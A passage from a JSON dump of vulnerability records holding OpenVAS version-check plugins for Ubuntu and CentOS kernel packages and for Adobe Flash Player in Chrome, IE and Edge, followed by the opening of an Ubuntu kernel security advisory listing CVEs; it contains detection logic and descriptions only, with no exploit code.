security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-132-powerpc64-emb\", ver:\"3.13.0-132.181\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-132-powerpc64-smp\", ver:\"3.13.0-132.181\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.132.141\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.132.141\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.132.141\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.132.141\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.132.141\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.132.141\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.132.141\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.132.141\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:17:01", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2017-07-18T00:00:00", "id": "OPENVAS:1361412562310811497", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811497", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Windows", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811497\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2015-8459\", \"CVE-2015-8460\", \"CVE-2015-8634\", \"CVE-2015-8635\",\n \"CVE-2015-8636\", \"CVE-2015-8638\", \"CVE-2015-8639\", \"CVE-2015-8640\",\n \"CVE-2015-8641\", \"CVE-2015-8642\", \"CVE-2015-8643\", \"CVE-2015-8644\",\n \"CVE-2015-8645\", \"CVE-2015-8646\", \"CVE-2015-8647\", \"CVE-2015-8648\",\n \"CVE-2015-8649\", \"CVE-2015-8650\", \"CVE-2015-8651\", \"CVE-2016-0959\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-18 15:23:26 +0530 (Tue, 18 Jul 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion vulnerability.\n\n - An integer overflow vulnerability.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers execute remote code and can get\n sensitive information which can lead to denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 20.0.0.267 within Google Chrome on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for\n Google Chrome 20.0.0.267, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"20.0.0.267\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"20.0.0.267\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:19:10", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2017-07-18T00:00:00", "id": "OPENVAS:1361412562310811496", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811496", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Linux", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Linux\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811496\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2015-8459\", \"CVE-2015-8460\", \"CVE-2015-8634\", \"CVE-2015-8635\",\n \"CVE-2015-8636\", \"CVE-2015-8638\", \"CVE-2015-8639\", \"CVE-2015-8640\",\n \"CVE-2015-8641\", \"CVE-2015-8642\", \"CVE-2015-8643\", \"CVE-2015-8644\",\n \"CVE-2015-8645\", \"CVE-2015-8646\", \"CVE-2015-8647\", \"CVE-2015-8648\",\n \"CVE-2015-8649\", \"CVE-2015-8650\", \"CVE-2015-8651\", \"CVE-2016-0959\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-18 15:29:26 +0530 (Tue, 18 Jul 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion vulnerability.\n\n - An integer overflow vulnerability.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers execute remote code and can get\n sensitive information which can lead to denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 20.0.0.267 within Google Chrome on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for\n Google Chrome 20.0.0.267, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"20.0.0.267\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"20.0.0.267\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:21", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB2755801", "modified": "2019-05-03T00:00:00", "published": "2017-07-18T00:00:00", "id": "OPENVAS:1361412562310811495", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811495", "title": "Microsoft IE And Microsoft Edge Multiple Flash Player Vulnerabilities (KB2755801)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Multiple Flash Player Vulnerabilities (KB2755801)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_internet_explorer\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811495\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2015-8459\", \"CVE-2015-8460\", \"CVE-2015-8634\", \"CVE-2015-8635\",\n \"CVE-2015-8636\", \"CVE-2015-8638\", \"CVE-2015-8639\", \"CVE-2015-8640\",\n \"CVE-2015-8641\", \"CVE-2015-8642\", \"CVE-2015-8643\", \"CVE-2015-8644\",\n \"CVE-2015-8645\", \"CVE-2015-8646\", \"CVE-2015-8647\", \"CVE-2015-8648\",\n \"CVE-2015-8649\", \"CVE-2015-8650\", \"CVE-2015-8651\", \"CVE-2016-0959\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-18 15:28:26 +0530 (Tue, 18 Jul 2017)\");\n script_name(\"Microsoft IE And Microsoft Edge Multiple Flash Player Vulnerabilities (KB2755801)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB2755801\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion vulnerability.\n\n - An integer overflow vulnerability.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers execute remote code and can get\n sensitive information which can lead to denial of service.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 x32t/x64 Edition,\n\n Windows 8.1 for x32/x64 Edition and\n\n Windows Server 2012/2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/2755801\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1) <= 0){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE))\n{\n CPE = \"cpe:/a:adobe:flash_player_edge\";\n if(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)){\n exit(0);\n }\n}\n\nflashVer = infos['version'];\nif(!flashVer){\n exit(0);\n}\n\nflashPath = infos['location'];\nif(flashPath){\n flashPath = flashPath + \"\\Flashplayerapp.exe\";\n} else {\n flashPath = \"Could not find the install location\";\n}\n\nif(version_is_less(version:flashVer, test_version:\"20.0.0.267\"))\n{\n report = 'File checked: ' + flashPath + '\\n' +\n 'File version: ' + flashVer + '\\n' +\n 'Vulnerable range: ' + \"Less than 20.0.0.267\" + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:15:15", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2017-07-18T00:00:00", "id": "OPENVAS:1361412562310811498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811498", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Mac OS X", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Mac OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811498\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2015-8459\", \"CVE-2015-8460\", \"CVE-2015-8634\", \"CVE-2015-8635\",\n \"CVE-2015-8636\", \"CVE-2015-8638\", \"CVE-2015-8639\", \"CVE-2015-8640\",\n \"CVE-2015-8641\", \"CVE-2015-8642\", \"CVE-2015-8643\", \"CVE-2015-8644\",\n \"CVE-2015-8645\", \"CVE-2015-8646\", \"CVE-2015-8647\", \"CVE-2015-8648\",\n \"CVE-2015-8649\", \"CVE-2015-8650\", \"CVE-2015-8651\", \"CVE-2016-0959\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-18 15:33:26 +0530 (Tue, 18 Jul 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-01)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A type confusion vulnerability.\n\n - An integer overflow vulnerability.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers execute remote code and can get\n sensitive information which can lead to denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 20.0.0.267 within Google Chrome on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for\n Google Chrome 20.0.0.267, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"20.0.0.267\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"20.0.0.267\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:56", "bulletinFamily": "scanner", "description": "Check the version of kernel", "modified": "2019-03-11T00:00:00", "published": "2017-04-14T00:00:00", "id": "OPENVAS:1361412562310882694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882694", "title": "CentOS Update for kernel CESA-2017:0933 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2017:0933 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882694\");\n script_version(\"$Revision: 14095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 14:54:56 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-14 06:30:31 +0200 (Fri, 14 Apr 2017)\");\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2017:0933 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel,\nthe core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous\nbug fixes. Space precludes documenting all of these bug fixes in this\nadvisory. To see the complete list of bug fixes, users are directed to the\nreferences Knowledge Article.\n\nSecurity Fix(es):\n\n * A race condition flaw was found in the N_HLDC Linux kernel driver when\naccessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty device\ncould use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n * A flaw was found in the Linux kernel key management subsystem in which a\nlocal attacker could crash the kernel or corrupt the stack and additional\nmemory (denial of service) by supplying a specially crafted RSA key. This\nflaw panics the machine during the verification of the RSA key.\n(CVE-2016-8650, Moderate)\n\n * A flaw was found in the Linux kernel's implementation of setsockopt for\nthe SO_{SND RCV}BUFFORCE setsockopt() system call. Users with non-namespace\nCAP_NET_ADMIN are able to trigger this call and create a situation in which\nthe sockets sendbuff data size could be negative. This could adversely\naffect memory allocations and create situations where the system could\ncrash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n * A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file can\ncrash the system by causing the system to attempt to access unmapped kernel\nmemory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636 and\nRalf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was\ndiscovered by Paul Moore (Red Hat Engineering).\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0933\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-April/022385.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/2986951\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.16.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:22:20", "bulletinFamily": "unix", "description": "USN-3422-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu 12.04 LTS.\n\nIt was discovered that a buffer overflow existed in the Bluetooth stack of the Linux kernel when handling L2CAP configuration responses. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-1000251)\n\nIt was discovered that the asynchronous I/O (aio) subsystem of the Linux kernel did not properly set permissions on aio memory mappings in some situations. An attacker could use this to more easily exploit other vulnerabilities. (CVE-2016-10044)\n\nBaozeng Ding and Andrey Konovalov discovered a race condition in the L2TPv3 IP Encapsulation implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-10200)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem implementation in the Linux kernel did not clear the setgid bit during a setxattr call. A local attacker could use this to possibly elevate group privileges. (CVE-2016-7097)\n\nSergej Schumilo, Ralf Spenneberg, and Hendrik Schwartke discovered that the key management subsystem in the Linux kernel did not properly allocate memory in some situations. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-8650)\n\nVlad Tsyrklevich discovered an integer overflow vulnerability in the VFIO PCI driver for the Linux kernel. A local attacker with access to a vfio PCI device file could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-9083, CVE-2016-9084)\n\nIt was discovered that an information leak existed in __get_user_asm_ex() in the Linux kernel. A local attacker could use this to expose sensitive information. (CVE-2016-9178)\n\nCAI Qian discovered that the sysctl implementation in the Linux kernel did not properly perform reference counting in some situations. An unprivileged attacker could use this to cause a denial of service (system hang). (CVE-2016-9191)\n\nIt was discovered that the keyring implementation in the Linux kernel in some situations did not prevent special internal keyrings from being joined by userspace keyrings. A privileged local attacker could use this to bypass module verification. (CVE-2016-9604)\n\nIt was discovered that an integer overflow existed in the trace subsystem of the Linux kernel. A local privileged attacker could use this to cause a denial of service (system crash). (CVE-2016-9754)\n\nAndrey Konovalov discovered that the IPv4 implementation in the Linux kernel did not properly handle invalid IP options in some situations. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2017-5970)\n\nDmitry Vyukov discovered that the Linux kernel did not properly handle TCP packets with the URG flag. A remote attacker could use this to cause a denial of service. (CVE-2017-6214)\n\nIt was discovered that a race condition existed in the AF_PACKET handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-6346)\n\nIt was discovered that the keyring implementation in the Linux kernel did not properly restrict searches for dead keys. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-6951)\n\nDmitry Vyukov discovered that the generic SCSI (sg) subsystem in the Linux kernel contained a stack-based buffer overflow. A local attacker with access to 